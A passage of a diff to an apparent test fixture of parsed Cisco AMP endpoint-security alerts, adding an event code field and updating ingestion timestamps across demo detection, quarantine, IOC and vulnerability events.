Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517762\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411132837046518000",
@@ -2355,8 +2384,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:40:55.631416952Z",
+                "ingested": "2021-09-30T00:13:59.322483920Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411132837046518000,\"timestamp\":1610552212,\"timestamp_nanoseconds\":682000000,\"date\":\"2021-01-13T15:36:52+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.0B965CA8AF-95.SBX.TG\",\"detection_id\":\"6411132837046517761\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\",\"sha1\":\"5faebef3bb880489195e80e6656ccf442ff7123b\",\"md5\":\"84b6f7be5370c1998886214790c6892b\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411132837046518000",
@@ -2434,8 +2464,9 @@
             },
             "event": {
                 "severity": 1,
-                "ingested": "2021-09-27T00:40:55.631418862Z",
+                "ingested": "2021-09-30T00:13:59.322486161Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15152998206589,\"timestamp\":1610534253,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-13T10:37:33+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1610534253,\"start_date\":\"2021-01-13T10:37:33+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WINWORD.EXE\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2013\",\"cve\":\"CVE-2014-0260\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260\"},{\"cve\":\"CVE-2014-1761\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761\"},{\"cve\":\"CVE-2014-6357\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357\"},{\"cve\":\"CVE-2015-0085\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085\"},{\"cve\":\"CVE-2015-0086\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086\"},{\"cve\":\"CVE-2015-1641\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641\"},{\"cve\":\"CVE-2015-1650\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650\"},{\"cve\":\"CVE-2015-1682\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682\"},{\"cve\":\"CVE-2015-2379\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379\"},{\"cve\":\"CVE-2015-2380\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380\"},{\"cve\":\"CVE-2015-2424\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424\"},{\"cve\":\"CVE-2016-0127\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127\"},{\"cve\":\"CVE-2016-7193\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193\"},{\"cve\":\"CVE-2017-0292\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292\"},{\"cve\":\"CVE-2017-11826\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826\"}]}}",
+                "code": "1107296279",
                 "kind": "alert",
                 "start": "2021-01-13T10:37:33.000Z",
                 "action": "Vulnerable Application Detected",
@@ -2597,11 +2628,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Policy Update",
-                "ingested": "2021-09-27T00:40:55.631420788Z",
+                "ingested": "2021-09-30T00:13:59.322488385Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508159571352093000,\"timestamp\":1610533415,\"timestamp_nanoseconds\":349000000,\"date\":\"2021-01-13T10:23:35+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
-                "id": "6508159571352093000",
-                "kind": "alert"
+                "code": "553648130",
+                "kind": "alert",
+                "action": "Policy Update",
+                "id": "6508159571352093000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -2667,8 +2699,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:40:55.631422694Z",
+                "ingested": "2021-09-30T00:13:59.322490604Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298360312529000,\"timestamp\":1610532793,\"timestamp_nanoseconds\":312509000,\"date\":\"2021-01-13T10:13:13+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610532793,\"start_date\":\"2021-01-13T10:13:13+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-13T10:13:13.000Z",
                 "action": "Cloud IOC",
@@ -2753,8 +2786,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631424608Z",
+                "ingested": "2021-09-30T00:13:59.322492813Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1515298355162029000,\"timestamp\":1610532788,\"timestamp_nanoseconds\":162019000,\"date\":\"2021-01-13T10:13:08+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610532788,\"start_date\":\"2021-01-13T10:13:08+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"PowerShell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-13T10:13:08.000Z",
                 "action": "Cloud IOC",
@@ -2832,8 +2866,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631426664Z",
+                "ingested": "2021-09-30T00:13:59.322495198Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6508153524038140000,\"timestamp\":1610532007,\"timestamp_nanoseconds\":606000000,\"date\":\"2021-01-13T10:00:07+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6508153524038139905\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"38:1e:eb:ba:2c:15\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6508153524038140000",
@@ -2910,8 +2945,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:40:55.631428668Z",
+                "ingested": "2021-09-30T00:13:59.322497481Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521062325693667300,\"timestamp\":1610447087,\"timestamp_nanoseconds\":693632000,\"date\":\"2021-01-12T10:24:47+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610447087,\"start_date\":\"2021-01-12T10:24:47+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-12T10:24:47.000Z",
                 "action": "Cloud IOC",
@@ -2981,11 +3017,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Policy Update",
-                "ingested": "2021-09-27T00:40:55.631430591Z",
+                "ingested": "2021-09-30T00:13:59.322499737Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6532910514396201000,\"timestamp\":1610446522,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-12T10:15:22+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
-                "id": "6532910514396201000",
-                "kind": "alert"
+                "code": "553648130",
+                "kind": "alert",
+                "action": "Policy Update",
+                "id": "6532910514396201000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -3069,8 +3106,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631432536Z",
+                "ingested": "2021-09-30T00:13:59.322502030Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6525520937264087000",
@@ -3146,8 +3184,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631434453Z",
+                "ingested": "2021-09-30T00:13:59.322504227Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6525520937264087000",
@@ -3242,8 +3281,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631436373Z",
+                "ingested": "2021-09-30T00:13:59.322506452Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6525516191325225000",
@@ -3319,8 +3359,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631438355Z",
+                "ingested": "2021-09-30T00:13:59.322508675Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6525516191325225000",
@@ -3397,8 +3438,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:40:55.631440284Z",
+                "ingested": "2021-09-30T00:13:59.322510884Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2020-12-25T05:30:41.000Z",
                 "action": "Cloud IOC",
@@ -3483,8 +3525,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:40:55.631442217Z",
+                "ingested": "2021-09-30T00:13:59.322513087Z",
